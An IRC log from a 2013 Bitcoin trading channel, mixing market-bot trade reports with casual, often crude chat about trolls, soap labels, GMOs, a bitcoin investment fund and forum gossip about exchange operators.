[16:47] * bitcoin935 (3246306d@gateway/web/freenode/ip.50.70.48.109) Quit (Quit: <ThickAsThieves> sometimes i watch "the three stooges" to take notes.) Oct 26 03:04:51 <mircea_popescu> so i guess this is the that guy, what's his name Oct 26 03:05:03 <monkey`> shutup gypsy Oct 26 03:05:26 <mircea_popescu> what were you originally ? the guy with the cars/living standards/whatnot Oct 26 03:05:28 <monkey`> where is your online game? Oct 26 03:05:29 <mod6> money` = EB Oct 26 03:05:39 <mod6> *monkey` Oct 26 03:05:48 <nubbins`> oh! eskimo bob? Oct 26 03:05:55 <mircea_popescu> no ?! Oct 26 03:05:56 <mod6> yah, long time no troll Oct 26 03:06:08 <asciilifeform> reptilia? is back? Oct 26 03:06:10 <monkey`> mircea_popescu: where is your online RPG? Oct 26 03:06:11 <mircea_popescu> ahaha, wait, the "fuck asics, i'll make a heat oven PMG" ? Oct 26 03:06:16 <nubbins`> ^ Oct 26 03:06:39 <mircea_popescu> monkey` i can't tell you cause you'll probably be mean to it. Oct 26 03:06:50 <monkey`> mircea right Oct 26 03:06:59 <monkey`> mircea is an adult? lol. Oct 26 03:07:08 <monkey`> fake name too Oct 26 03:07:16 <nubbins`> everybody's an adult but you ;) Oct 26 03:07:36 <mircea_popescu> but srsly, http://minigame.bz/eulora/binaries/ Oct 26 03:07:46 <nubbins`> ^ Oct 26 03:08:31 <dexX7> you sure are minimal.. http://minigame.bz/ Oct 26 03:08:52 <mircea_popescu> dexX7 you know the all one california crazy soap ? Oct 26 03:09:31 <dexX7> which one? californication? Oct 26 03:09:34 <mircea_popescu> nono Oct 26 03:09:39 <dexX7> i have no idea what you are talking about Oct 26 03:09:41 <dexX7> :/ Oct 26 03:09:46 <mircea_popescu> http://www.drbronner.com/ Oct 26 03:09:47 <ozbot> Dr. Bronner's Magic Soaps All-One Oct 26 03:09:58 <dexX7> haha wtf Oct 26 03:10:05 <mircea_popescu> you should see the labels on those things Oct 26 03:10:15 <mircea_popescu> it's basically timecube on a fmcg label Oct 26 03:10:16 <nubbins`> i watched a documentary on that soap a while ago Oct 26 03:10:26 <nubbins`> weird people Oct 26 03:10:53 <mircea_popescu> it Oct 26 03:11:05 <mircea_popescu> 's even got sideways print to fill all available surfaces with rant Oct 26 03:12:21 <dexX7> interesting approach Oct 26 03:13:26 <mircea_popescu> dexX7's TIL counter is getting tickled today lol Oct 26 03:13:43 <nubbins`> hmm, EB has fallen oddly silent Oct 26 03:14:01 <mircea_popescu> i think it's the other guy honestly Oct 26 03:14:05 <mircea_popescu> what the fuck was his original handle Oct 26 03:14:07 <nubbins`> ah Oct 26 03:14:12 <mircea_popescu> dub what's the guy's handle ? Oct 26 03:14:27 <benkay> tib? Oct 26 03:14:30 <mircea_popescu> a a yes Oct 26 03:14:32 <mircea_popescu> tiberiusd Oct 26 03:14:34 <assbot> [HAVELOCK] [AM1] 1 @ 0.74 BTC [-] Oct 26 03:14:45 <benkay> tib was a class act Oct 26 03:15:17 <benkay> he even got you worked up a few times Oct 26 03:15:48 <mircea_popescu> o ya ? Oct 26 03:17:09 <benkay> point is this human is no tiberiusxiv Oct 26 03:17:17 <nubbins`> (HEH) Oct 26 03:17:42 <mircea_popescu> mebbeh so Oct 26 03:22:42 <assbot> [HAVELOCK] [AM100] 19 @ 0.00727552 = 0.1382 BTC [-] {3} Oct 26 03:22:43 <assbot> [HAVELOCK] [NEOBEE] 250 @ 0.00239999 = 0.6 BTC [-] {2} Oct 26 03:23:44 <assbot> [HAVELOCK] [B] [XBOND] 103 @ 0.00114798 = 0.1182 BTC [+] {2} Oct 26 03:27:47 <assbot> [HAVELOCK] [NEOBEE] 250 @ 0.00239999 = 0.6 BTC [-] Oct 26 03:29:49 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.00239999 = 0.24 BTC [-] Oct 26 03:33:16 <mircea_popescu> http://trilema.com/2013/were-all-one/ dex there's a pic of the label there. Oct 26 03:33:17 <ozbot> We’re all one pe Trilema - Un blog de Mircea Popescu. Oct 26 03:33:54 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.0024 = 0.24 BTC [+] Oct 26 03:35:07 <benkay> amazing soap Oct 26 03:35:08 <assbot> AMAZING COMPANY! Oct 26 03:35:19 <Kleeck_> assbot is such a dick Oct 26 03:35:33 <mircea_popescu> strangely enough, it IS the best soap in the us Oct 26 03:38:32 <dexX7> lol Oct 26 03:38:37 <dexX7> indeed an amazing soap Oct 26 03:38:38 <assbot> AMAZING COMPANY! Oct 26 03:42:02 <assbot> [HAVELOCK] [VTX] 1 @ 0.34 BTC [+] Oct 26 03:42:05 <nubbins`> http://all-one-typography.com/Dr_Bronners-label-Peppermint-32oz.jpg Oct 26 03:42:43 <nubbins`> i'm outta here, it's friday night and i'm still sober Oct 26 03:43:25 <KRS1> do something about that player im about to Oct 26 03:43:46 <mircea_popescu> omfg they have it online. wow. Oct 26 03:44:04 <assbot> [HAVELOCK] [CFIG] 1 @ 0.16 BTC [-] Oct 26 04:03:14 <benkay> y'all should see their new tirades about GMOs Oct 26 04:04:57 <Kleeck_> GMOs are the devil. Oct 26 04:05:22 <benkay> dat binary thinking Oct 26 04:05:36 <Kleeck_> dat assumption. Oct 26 04:05:38 <Kleeck_> :) Oct 26 04:05:54 <Kleeck_> "Agree with me or you're binary!" Oct 26 04:05:55 <Kleeck_> ROFL. Oct 26 04:06:00 <Kleeck_> The illusion of intelligence. Oct 26 04:06:10 <benkay> what ams devil? Oct 26 04:06:55 <benkay> what ams gmo? Oct 26 04:07:06 <benkay> i just want a little more subtlety in the conversation Oct 26 04:07:15 <KRS1> nothing wrong with gmo's..people just being paranoid. Oct 26 04:07:32 <benkay> f.ex: an organism identified to carry a certain set of genes bred with another organism some breeders would like to see that gene in Oct 26 04:07:36 <benkay> ams gmo? Oct 26 04:07:59 <KRS1> benkay: engineers reprogram for instance the dna of a tomato so they grow really big and feed more people..a really simple example Oct 26 04:08:06 <mircea_popescu> benkay do you understand the process behind gmo ? Oct 26 04:08:35 <benkay> (mircea_popescu: yes) Oct 26 04:08:55 <mircea_popescu> well so then that's the objection. has nothing to do with reproduction, it's just mashing things together Oct 26 04:09:08 <benkay> i'm quibbling about what it means for a thing to be a "genetically modified organism" Oct 26 04:09:36 <benkay> especially given what's coming out about the common nature of organic viral-driven lateral gene transfer Oct 26 04:09:36 <mircea_popescu> it means to have undergone this process where random bits of dna were thrown at a large number of cells just like it, in the hopes that something maybe catches. Oct 26 04:09:45 <dexX7> usually it's more like "we make the tomato resistant vs pesticide x" afaik Oct 26 04:10:15 <mircea_popescu> benkay i will trust a natural process, such as viral transfer, on the grounds that in millenia of practice it failed to make the world dangerous for me. Oct 26 04:10:37 <mircea_popescu> i will not trust an industrial process, such as gmo, on the grounds that in centuries of practice it NEVER failed to make the world dangerous for me. Oct 26 04:10:56 <dexX7> ^ +1 Oct 26 04:10:57 <mircea_popescu> quite a gap there Oct 26 04:11:30 <benkay> on the same note, everything that increases agricultural output is a bad thing 'cause it leads rather quickly to more humans Oct 26 04:12:08 <asciilifeform> there's also the more prosaic fact that 99% of gmo work is for: pesticide resistance. Oct 26 04:12:20 <mircea_popescu> that's also a good point yeah. Oct 26 04:12:22 <asciilifeform> pesticide/herbicide Oct 26 04:12:36 <mircea_popescu> benkay i doubt there's much relation. famine is well resilient to dropping prices of grain Oct 26 04:13:15 <mircea_popescu> people will make ethanol out of corn or buy it to rot in govt "reserves" before feeding any starving idiots Oct 26 04:13:22 <asciilifeform> btw, when will the drug aficionados get around to the fabled 'THC tomato.' that'd be something to write home about. Oct 26 04:14:06 <benkay> why would you put those genes in a plant that fruits? Oct 26 04:14:22 <mircea_popescu> what plant doesn't fruit ?! Oct 26 04:14:34 <asciilifeform> camouflage. Oct 26 04:15:00 <benkay> actually now i'm curious what an unpollinated tomato would do Oct 26 04:15:20 <benkay> 'cause that's how one prevents a pot plant from going to seed Oct 26 04:15:41 <benkay> anyways there's decades of breeding in the pot plants that i find it hard to imagine getting around with gmos Oct 26 04:15:55 <mircea_popescu> you never know your luck Oct 26 04:16:01 <mircea_popescu> gmo is basically a game of vegas slots Oct 26 04:16:16 <mircea_popescu> except people have found a way to get investors to pay for it Oct 26 04:16:43 <asciilifeform> very much so. a place i worked went broke partly because we couldn't get a necessary transfection going. Oct 26 04:17:55 <mircea_popescu> it's basically a game of "twelve lines" or "six lines" or w/e Oct 26 04:18:00 <mircea_popescu> those lines could each be 1 in 100 Oct 26 04:18:06 <mircea_popescu> or they could be 1 in 10^65 Oct 26 04:18:09 <mircea_popescu> you don't know... Oct 26 04:18:17 <mircea_popescu> so you get five of the six... and that's all you're going to get. Oct 26 04:18:28 <asciilifeform> it's also a game of 'e. coli simply can't be persuaded to piss out X.' or 'croaks trying.' Oct 26 04:19:13 <mircea_popescu> that's probably the product of the future, by the way : the organic computer. Oct 26 04:19:18 <KRS1> yes Oct 26 04:19:24 <mircea_popescu> in the sense of, this programmable device capable of controlled gmoization. Oct 26 04:19:52 <mircea_popescu> sort of like a 3d printer + desktop combo, but made out of cunt tissue and capable of pissing apples. Oct 26 04:20:00 <mircea_popescu> (not whole apples, of course. apple paste) Oct 26 04:20:04 <asciilifeform> we have those already: chinese postdocs. they don't always cut it, though. Oct 26 04:20:10 <KRS1> heh thats quite a picture Oct 26 04:20:51 <mircea_popescu> asciilifeform nah, they can't actually sprout shitake. Oct 26 04:20:56 <KRS1> i would like pr0ns of that Oct 26 04:22:16 <mircea_popescu> anyway, asciilifeform, the saddest story to date is of this corp that MANAGED it. once. Oct 26 04:22:27 <mircea_popescu> they figured it's easy to do, and so didn't pay enough attention to the samples Oct 26 04:22:28 <mircea_popescu> which died. Oct 26 04:22:33 <mircea_popescu> and then could never do it again. Oct 26 04:22:39 <asciilifeform> managed what? Oct 26 04:22:51 <mircea_popescu> the whole list of combos they needed Oct 26 04:23:09 <mircea_popescu> apparently one of them being a very improbable occurence they lucked out on. once. Oct 26 04:23:42 <asciilifeform> when you're in bio business, you have to be prepared that your working capital can literally croak. Oct 26 04:23:51 <asciilifeform> one of the worst occasions is when a mouse farm dies Oct 26 04:23:55 <asciilifeform> this can happen overnight. Oct 26 04:24:25 <asciilifeform> (little buggers all catch something at once. esp. if they're immunocompromised for whatever reason.) Oct 26 04:24:42 <mircea_popescu> yeah. Oct 26 04:25:21 <mircea_popescu> afaik you can't even go into the mouse farms anymore Oct 26 04:25:24 <mircea_popescu> wholly robotic shit Oct 26 04:25:38 <asciilifeform> btw, phun phact: they're under 24/7 armed guard, in any respectable shop. Oct 26 04:26:04 <asciilifeform> i've never once been inside - didn't have clearance. Oct 26 04:26:15 <mircea_popescu> well 20 years ago it was a lot more amicable a thing Oct 26 04:27:08 <mircea_popescu> ;;ident benkay Oct 26 04:27:09 <gribble> Nick 'benkay', with hostmask 'benkay!~benkay@c-71-193-200-93.hsd1.or.comcast.net', is not identified. Oct 26 04:27:21 <asciilifeform> the newer ones have compartmentalized air supplies for individual lots - a bit like dirigible ballonettes. Oct 26 04:27:51 <benkay> ;;ident benkay Oct 26 04:27:52 <gribble> Nick 'benkay', with hostmask 'benkay!~benkay@c-71-193-200-93.hsd1.or.comcast.net', is not identified. Oct 26 04:27:55 <benkay> wa Oct 26 04:28:06 <benkay> oh wot as well Oct 26 04:28:26 <benkay> a full day of fighting stupid computers Oct 26 04:31:50 <assbot> [MPEX] [S.MPOE] 7400 @ 0.00082881 = 6.1332 BTC [+] {2} Oct 26 04:33:09 <benkay> !mp http://dpaste.com/1429816/plain/ Oct 26 04:33:10 <assbot> Processing. Oct 26 04:33:11 <assbot> Response: http://dpaste.com/1429817/plain/ Oct 26 04:33:43 <benkay> the robots hate me today Oct 26 04:37:50 <asciilifeform> benkay: industrial robo? Oct 26 04:38:23 <benkay> no, i got shot of actual physical fucking atoms a year ago Oct 26 04:38:35 <benkay> nearly a year and a half! Oct 26 04:38:43 <benkay> the cloud robots. Oct 26 04:40:41 <asciilifeform> i still can't bring myself to call a widget that pushes only electrons a robot. Oct 26 04:41:59 <benkay> the widgets for which i'm responsible ultimately move atoms around Oct 26 04:42:19 <benkay> but only after shunting lots of electrons and making lots of api calls and getting the odd human involved Oct 26 04:43:07 <benkay> far more fun to play with than the industrial type Oct 26 04:43:56 <asciilifeform> there's an undeniable sportsmanship appeal to programming a computer that might kill you, however. Oct 26 04:44:02 <assbot> [HAVELOCK] [AM100] 50 @ 0.00722 = 0.361 BTC [-] {2} Oct 26 04:44:34 <benkay> mega personal happiness penalties from programming in proprietary ladder logic though Oct 26 04:45:47 <asciilifeform> it beats xyz arms hooked up to winblows boxes. Oct 26 04:46:04 <benkay> comprable Oct 26 04:46:27 <benkay> the only upside to that gig was watching the shop operators grow more and more uncomfortable around me and my robots during my tenure Oct 26 04:47:45 <benkay> i would have enjoyed it more had i embraced my sadistic side earlier in life. Oct 26 04:48:07 <assbot> [HAVELOCK] [AM100] 60 @ 0.00720016 = 0.432 BTC [-] {2} Oct 26 04:52:23 <mircea_popescu> http://trilema.com/2013/mpoe-october-2013-statement/ Oct 26 04:52:25 <ozbot> MPOE, October 2013 Statement pe Trilema - Un blog de Mircea Popescu. Oct 26 04:52:49 <mircea_popescu> meanwhile back at the ranch, "Michelle Obama’s Princeton classmate is a top executive at the company that earned the contract to build the failed Obamacare website" Oct 26 04:53:12 <assbot> [HAVELOCK] [AM100] 66 @ 0.00700777 = 0.4625 BTC [-] {4} Oct 26 05:06:47 <mircea_popescu> japan gets another 7.1 Oct 26 05:16:20 <mircea_popescu> http://rt.com/usa/nsa-site-ddos-attack-754/ Oct 26 05:19:07 <dexX7> @AnonymousOwn3r << this guy is a joke Oct 26 05:19:14 <dexX7> it's a wonder that he is still on the nets Oct 26 05:20:50 <mircea_popescu> why ? nobody really goes after the jokers. Oct 26 05:23:09 <dexX7> hmhm.. i'm not sure what exactly the issue was, but do you remember when almost all godaddy related/hosted websites went black a year ago or so? Oct 26 05:23:29 <mircea_popescu> vaguely Oct 26 05:23:37 <dexX7> this was the time this guy popped up, claiming it was him, web news picked it up Oct 26 05:24:05 <dexX7> from that point on he claimed he was behind "everything" on the nets, but of course he wasn't Oct 26 05:24:26 <dexX7> people found his facebook account etc. where he was posting screenshots of his "operations" Oct 26 05:24:43 <assbot> [MPEX] [S.MPOE] 5239 @ 0.00082487 = 4.3215 BTC [-] Oct 26 05:24:43 <assbot> [HAVELOCK] [VTX] 1 @ 0.34 BTC [+] Oct 26 05:25:43 <mircea_popescu> hm. Oct 26 05:25:47 <dexX7> http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/ Oct 26 05:25:48 <ozbot> GoDaddy Outage Takes Down Millions Of Sites, Anonymous Member Claims Responsibility | TechCrunch Oct 26 05:26:12 <mircea_popescu> anyway, im sure the twitter in question is being run by some teen having fun, otherwise unrelated to anything Oct 26 05:26:36 <dexX7> haha yea Oct 26 05:28:57 <bloctoc> go daddy down probably related to savetoby.com http://www.bobparsons.me/archive_article.php?entry_id=38 Oct 26 05:32:31 <dexX7> A man claims to have found an injured, young rabbit under a porch one day, and then nursed it back to health. He then named the rabbit Toby. This individual swears that he will have Toby butchered and served for dinner on June 30, 2005, unless he is able to raise $50,000 in donations or merchandise sales. Oct 26 05:33:49 <KRS1> clever Oct 26 05:33:54 <KRS1> he'll probably get it too Oct 26 05:35:40 <bloctoc> The response from GoDaddy Founder: "I now own a SaveToby.com mouse pad" Oct 26 06:14:32 <assbot> [HAVELOCK] [HIM] 6 @ 0.07467 = 0.448 BTC [+] Oct 26 06:18:36 <assbot> [HAVELOCK] [HIM] 2 @ 0.07468 = 0.1494 BTC [+] Oct 26 06:29:47 <assbot> [MPEX] [S.MPOE] 12800 @ 0.00082403 = 10.5476 BTC [-] {3} Oct 26 06:36:54 <assbot> [HAVELOCK] [NEOBEE] 1892 @ 0.0024 = 4.5408 BTC [+] Oct 26 06:36:55 <assbot> [MPEX] [S.MPOE] 1827 @ 0.00082285 = 1.5033 BTC [-] Oct 26 06:38:56 <assbot> [HAVELOCK] [CBTC] 4906 @ 0.00015999 = 0.7849 BTC [+] {2} Oct 26 06:38:57 <assbot> [HAVELOCK] [B] [XBOND] 1000 @ 0.00114799 = 1.148 BTC [+] Oct 26 06:59:17 <assbot> [MPEX] [S.MPOE] 6112 @ 0.0008224 = 5.0265 BTC [-] {2} Oct 26 06:59:17 <assbot> [HAVELOCK] [NEOBEE] 45 @ 0.00248999 = 0.112 BTC [+] Oct 26 07:08:26 <assbot> [HAVELOCK] [CBTC] 2589 @ 0.00015903 = 0.4117 BTC [-] {2} Oct 26 07:17:35 <assbot> [HAVELOCK] [B] [XBOND] 1036 @ 0.00114799 = 1.1893 BTC [+] Oct 26 07:20:38 <assbot> [HAVELOCK] [HIM] 7 @ 0.07467 = 0.5227 BTC [-] Oct 26 07:38:55 <assbot> [HAVELOCK] [B] [XBOND] 600 @ 0.00114799 = 0.6888 BTC [+] Oct 26 07:48:04 <assbot> [HAVELOCK] [B] [XBOND] 500 @ 0.00114799 = 0.574 BTC [+] Oct 26 08:24:41 <assbot> [MPEX] [S.MPOE] 12416 @ 0.00082662 = 10.2633 BTC [+] {3} Oct 26 09:16:33 <assbot> [HAVELOCK] [AM1] 1 @ 0.787 BTC [+] Oct 26 09:18:35 <assbot> [HAVELOCK] [AM100] 35 @ 0.00748898 = 0.2621 BTC [-] Oct 26 09:21:38 <assbot> [HAVELOCK] [AM100] 50 @ 0.00749 = 0.3745 BTC [+] Oct 26 09:28:44 <assbot> [HAVELOCK] [AM100] 37 @ 0.00749999 = 0.2775 BTC [+] Oct 26 09:30:46 <assbot> [HAVELOCK] [AM100] 298 @ 0.00759 = 2.2618 BTC [+] Oct 26 09:30:47 <assbot> [HAVELOCK] [CFIG] 1 @ 0.16 BTC [-] Oct 26 09:31:47 <assbot> [HAVELOCK] [CFIG] 1 @ 0.18 BTC [+] Oct 26 09:39:55 <assbot> [HAVELOCK] [AM100] 130 @ 0.007681 = 0.9985 BTC [+] Oct 26 09:43:59 <assbot> [HAVELOCK] [NEOBEE] 1008 @ 0.0024 = 2.4192 BTC [-] Oct 26 09:51:06 <assbot> [HAVELOCK] [AM1] 1 @ 0.787999 BTC [+] Oct 26 09:59:14 <assbot> [HAVELOCK] [AM100] 25 @ 0.00726101 = 0.1815 BTC [-] Oct 26 10:25:41 <assbot> [HAVELOCK] [B] [XBOND] 261 @ 0.00114799 = 0.2996 BTC [+] Oct 26 10:26:42 <assbot> [MPEX] [S.MPOE] 3600 @ 0.00082616 = 2.9742 BTC [-] Oct 26 10:27:43 <assbot> [HAVELOCK] [AM1] 1 @ 0.761 BTC [-] Oct 26 10:28:44 <assbot> [HAVELOCK] [AM1] 2 @ 0.76 = 1.52 BTC [-] **** BEGIN LOGGING AT Sat Oct 26 18:46:17 2013 Oct 26 18:46:20 <mike_c> hard to tell ;) Oct 26 18:50:09 <mircea_popescu> mike_c: Oct 26 18:50:09 <mircea_popescu> can anybody do anything on mpex yet? i see trades on assbot, but nobody here seems to be able to talk to it (including me)? << atm proxies are dumping most of the input because they can't agree its valid Oct 26 18:50:13 <mircea_popescu> being worked on Oct 26 18:53:09 <mike_c> k, thanks for update Oct 26 18:54:36 <mircea_popescu> jurov mod6 any of you want to try now ? Oct 26 19:00:19 <mircea_popescu> VanCleef you know, for a site that nobody uses i'm always surprised to see public channels notice any hickup a minute before or a minute after the tech people whose job it is. Oct 26 19:04:04 <assbot> [HAVELOCK] [AM1] 1 @ 0.81 BTC [+] Oct 26 19:08:08 <assbot> [MPEX] [S.MPOE] 5526 @ 0.0008051 = 4.449 BTC [-] {2} Oct 26 19:09:09 <assbot> [MPEX] [S.MPOE] 5836 @ 0.00080476 = 4.6966 BTC [-] {2} Oct 26 19:12:46 <[\\\]> mircea_popescu: don't feed the trolls. Oct 26 19:13:01 <mircea_popescu> but i got all this spare food Oct 26 19:13:12 <[\\\]> put it down the garbage disposal. Oct 26 19:13:18 <[\\\]> It has the same equivalent. Oct 26 19:16:46 <KRS1> moar Oct 26 19:21:09 <mircea_popescu> $post MWhEZwxU Oct 26 19:21:12 <mpexbot> mircea_popescu: http://pastebin.com/PA4D1dGZ Oct 26 19:21:21 <mircea_popescu> i r insult. Oct 26 19:23:22 <assbot> [HAVELOCK] [AM100] 129 @ 0.00754572 = 0.9734 BTC [+] {4} Oct 26 19:24:23 <assbot> [HAVELOCK] [AM100] 190 @ 0.00769367 = 1.4618 BTC [+] {4} Oct 26 19:25:24 <assbot> [HAVELOCK] [AM100] 19 @ 0.0077 = 0.1463 BTC [+] Oct 26 19:27:26 <assbot> [HAVELOCK] [HIM] 5 @ 0.074698 = 0.3735 BTC [+] {2} Oct 26 19:30:29 <assbot> [HAVELOCK] [VTX] 7 @ 0.32250572 = 2.2575 BTC [-] {4} Oct 26 19:31:30 <assbot> [HAVELOCK] [VTX] 4 @ 0.31332001 = 1.2533 BTC [-] {3} Oct 26 19:48:48 <assbot> [HAVELOCK] [AM100] 20 @ 0.0076999 = 0.154 BTC [-] Oct 26 19:56:43 <dexX7> mircea_popescu: did secondmarket ever contact you? Oct 26 19:58:07 <mircea_popescu> i don't recall on the spot. what would this be about ? Oct 26 19:58:20 <dexX7> secondmarket.com/fund/bitcoin-investment-trust Oct 26 19:58:53 <dexX7> i heard they are looking for people with many coins Oct 26 19:59:05 <dexX7> i was just curious :) Oct 26 19:59:19 <mircea_popescu> not afaik Oct 26 19:59:27 <mircea_popescu> also it looks scammy as all fuck, what the hell is that ? Oct 26 19:59:38 <dexX7> it's not a scam Oct 26 19:59:47 <mircea_popescu> how do you know this ? Oct 26 20:00:08 <VanCleef> bitcoin is a scam so yeh its a scam Oct 26 20:00:25 <dexX7> hm i don't know what it is exactly, but it's a plattform for accredited investors. afaik some big companies like twitter were "traded" there Oct 26 20:00:29 <mircea_popescu> no, i have specific things in mind. for instance, how come i can't find a name ion the about us page, Oct 26 20:00:54 <mircea_popescu> but instead find a sales pitch intended for people with a financial iq corresponding to about the age of 15 ? Oct 26 20:01:05 <mircea_popescu> and where's the finra etc regs. Oct 26 20:01:27 <dexX7> i don't know ;) Oct 26 20:01:29 <mircea_popescu> and what are all those llcs being held by incs i never heard about. Oct 26 20:01:43 <mircea_popescu> so yeah. now you know kinda how the mental process goes. Oct 26 20:02:20 <mircea_popescu> and as far as to the "were traded there" : i can put up a website tomorrow which claims to be trading your mom. this does not imply anything about the actual lady's probity. Oct 26 20:02:44 <mircea_popescu> it just means some kid with a html editor was bored Oct 26 20:02:50 <dexX7> i'm just saying what i read and i have no reason to believe that it's not true Oct 26 20:03:20 <dexX7> http://en.wikipedia.org/wiki/SecondMarket Oct 26 20:04:08 <mircea_popescu> no, see, this is the problem. you don;'t start by believing what you read is true, Oct 26 20:04:14 <mircea_popescu> you start by believing what you read is false. Oct 26 20:04:23 <mircea_popescu> this isn't school. Oct 26 20:05:15 <dexX7> fine, but how do i verify something then? Oct 26 20:05:29 <mircea_popescu> well that's where it gets complicated. give an actual example. Oct 26 20:05:30 <VanCleef> mp will verify it for you Oct 26 20:05:40 <mircea_popescu> lol that only works if you trust me. Oct 26 20:05:48 <VanCleef> i only trust mp Oct 26 20:05:54 <dexX7> i can't trust what i read, so i can't trust mp obviously :p Oct 26 20:06:40 <mircea_popescu> but i said "start". Oct 26 20:06:46 <Kleeck_> ROFL. Oct 26 20:06:52 <Kleeck_> THis is hilarious. Oct 26 20:07:24 <Kleeck_> TIL Secondmarket was written by "some kid with an html editor" Oct 26 20:07:27 <Kleeck_> http://dealbook.nytimes.com/2011/03/10/beyond-facebook-secondmarket-opens-its-doors-to-thousands/ Oct 26 20:07:54 <Kleeck_> It's a well known alt market. Oct 26 20:10:28 <mircea_popescu> not secondmarket dood. Oct 26 20:10:32 <mircea_popescu> some fund Oct 26 20:11:10 <Kleeck_> Their ETF? Oct 26 20:11:10 <zoinky> http://en.wikipedia.org/wiki/SecondMarket Oct 26 20:11:30 <mircea_popescu> it's their etf ? Oct 26 20:11:34 <Kleeck_> Yes. Oct 26 20:11:49 <mircea_popescu> dude i gotta relook at this site now. Oct 26 20:11:51 <Kleeck_> Similar to the winklevi, but without the need for SEC approval. Oct 26 20:12:03 <Kleeck_> Because it's limited to accredited investors only. Oct 26 20:12:18 <Kleeck_> I read an article about it a month or two ago Oct 26 20:12:19 <Kleeck_> I'll find it. Oct 26 20:12:20 <zoinky> secondmarket did privates stock for groupon, facebook and twitter Oct 26 20:12:24 <zoinky> before they went public Oct 26 20:12:25 <mircea_popescu> $25K Oct 26 20:12:25 <mircea_popescu> Min. Investment Oct 26 20:12:25 <mircea_popescu> 332 Oct 26 20:12:25 <mircea_popescu> Days Left Oct 26 20:12:40 <Kleeck_> Here it is: http://blogs.reuters.com/felix-salmon/2013/09/26/the-bitcoin-bug-bites-secondmarket/ Oct 26 20:12:45 <mircea_popescu> seems to me it's some random item on their platform anyone could have created, much like the other "open platforms" of the sort Oct 26 20:12:59 <Kleeck_> Yeah. It's not for your everyday Joe. That's what the Winklevii are trying. Oct 26 20:13:11 <pankkake> zoinky> secondmarket did privates stock for groupon, facebook and twitter <= so, scams Oct 26 20:13:18 <Kleeck_> ROFL Oct 26 20:13:25 <zoinky> i guess so Oct 26 20:13:28 <Kleeck_> YES! The "scam" label has reached an all time low. Oct 26 20:13:28 <zoinky> scams rule the world Oct 26 20:14:26 <pankkake> companies who have no intention to make their investors richer would be a more explicit label ;) Oct 26 20:14:29 <mircea_popescu> well what can i tell you. yes silbert is well known, no we've not talked, yes that fund looks dubious to me. Oct 26 20:15:10 <mircea_popescu> i guess judging by the site is a superficial approach to life. Oct 26 20:15:26 <Kleeck_> Sometimes I don't read book because the cover looks like shit. Oct 26 20:16:12 <pankkake> people judge mpex by its appearance Oct 26 20:16:34 <mircea_popescu> Kleeck_ i do that all the motherfucking time. i am fortunate to have people who love/hate me enough to insist on the topic. Oct 26 20:16:45 <Kleeck_> ^ Oct 26 20:16:57 <mircea_popescu> in fact, i did *the exact same thing* about bitcoin, it took commebnters on my blog ~3 months to get me to look again Oct 26 20:17:16 <assbot> [HAVELOCK] [AM1] 1 @ 0.8099 BTC [-] Oct 26 20:17:18 <Kleeck_> It help to have a circle of intelligent people that you respect. Oct 26 20:17:35 <Kleeck_> And who can be challenged and challenge you. Oct 26 20:18:16 <Kleeck_> Then when you say, "That's bullshit." They say, "No it isn't... Look at this!" Oct 26 20:18:28 <mircea_popescu> o, people love to challenge me. because i'm such a snotty asshole see ? Oct 26 20:18:31 <mircea_popescu> works out. Oct 26 20:18:38 <Kleeck_> :) Oct 26 20:20:19 <assbot> [HAVELOCK] [AM100] 992 @ 0.00788625 = 7.8232 BTC [+] {12} Oct 26 20:22:21 <assbot> [HAVELOCK] [NEOBEE] 174 @ 0.00262074 = 0.456 BTC [-] {4} Oct 26 20:25:24 <mircea_popescu> (also, fb IS a motherfucking scam. not at all in the same sense, of course) Oct 26 20:29:38 <dexX7> next question: people on reddit say theymos is a scammer, why? Oct 26 20:29:58 <mircea_popescu> well, better question would be "why this time" i think Oct 26 20:30:18 <mircea_popescu> at some point they were incensed about his reading pms on the forum, earlier about his poor manageemnt of forum donations, Oct 26 20:30:37 <mircea_popescu> earlier about his promiting pirate, earluier about his glbse stock dealings, Oct 26 20:30:40 <mircea_popescu> it's a list Oct 26 20:31:07 <dexX7> yeah, "this time" is about pirate again Oct 26 20:31:12 <dexX7> http://www.reddit.com/r/Bitcoin/comments/1p4shj/founder_reflects_on_the_closure_of_bitcoin_stock/ccyz2c4 Oct 26 20:31:13 <mircea_popescu> a ok. many of these recur. Oct 26 20:31:14 <ozbot> theymos comments on Founder reflects on the closure of Bitcoin stock exchange GLBSE Oct 26 20:32:24 <mircea_popescu> anyway, you're too new to know, but the way glbse croaked was like this : theymos announced a private sale of his glbse stock (+ some aussie scammer's) Oct 26 20:32:33 <mircea_popescu> a week later glbse just closed Oct 26 20:32:49 <mircea_popescu> the girl accused him of insider dealing, he swore he didn't have a clue wtf nefario was doing Oct 26 20:33:02 <mircea_popescu> the matter was dropped, as i believed him, Oct 26 20:33:04 <dexX7> was this before or after the "internal shareholder discussion2ß Oct 26 20:33:11 <mircea_popescu> but it left a lot of animosity between them Oct 26 20:33:20 <mircea_popescu> this was just about at that time Oct 26 20:33:37 <dexX7> ah okay Oct 26 20:37:53 <dexX7> i remember very vague that many had "bitcoin doesn't care about the sec" or so in their signatures. was this after glbse? Oct 26 20:37:56 <mircea_popescu> also, re the earlier discussion : sm is a marketplace for illiquid assets. it's not that it just magically gets past the hoops winklevoss have to jump through, it's a very specific thing Oct 26 20:38:08 <mircea_popescu> lest some bright young mind reads the log and gets confused. Oct 26 20:38:22 <mircea_popescu> right after. Oct 26 20:39:38 <assbot> [HAVELOCK] [B] [XBOND] 431 @ 0.00114799 = 0.4948 BTC [+] Oct 26 20:39:59 <zoinky> http://www.sec.gov/Archives/edgar/data/1588489/000158848913000001/xslFormDX01/primary_doc.xml Oct 26 20:40:03 <mircea_popescu> dexX7 https://bitcointalk.org/index.php?topic=115693.msg1249126#msg1249126 Oct 26 20:40:08 <zoinky> originally had 4 investors Oct 26 20:40:16 <zoinky> wonder how the next quarterly report will look Oct 26 20:41:08 <dexX7> haha nice, i think i stumbled upon this topic last year Oct 26 20:41:09 <mircea_popescu> pooled > other > not 40 Oct 26 20:42:19 <dexX7> well, they are already looking for investors as it seems. i filled out the "i'm interested form" and promptly received a mail with a request for a telephone call Oct 26 20:42:42 <dexX7> Total Amount Sold $2,542,818 USD Oct 26 20:42:53 <mircea_popescu> i don't think they're doing anything bad, and heck, bitcoin can benefit from the attention of more people with financial expertise Oct 26 20:42:57 <mircea_popescu> which these guys have Oct 26 20:42:59 <mircea_popescu> so, good for them Oct 26 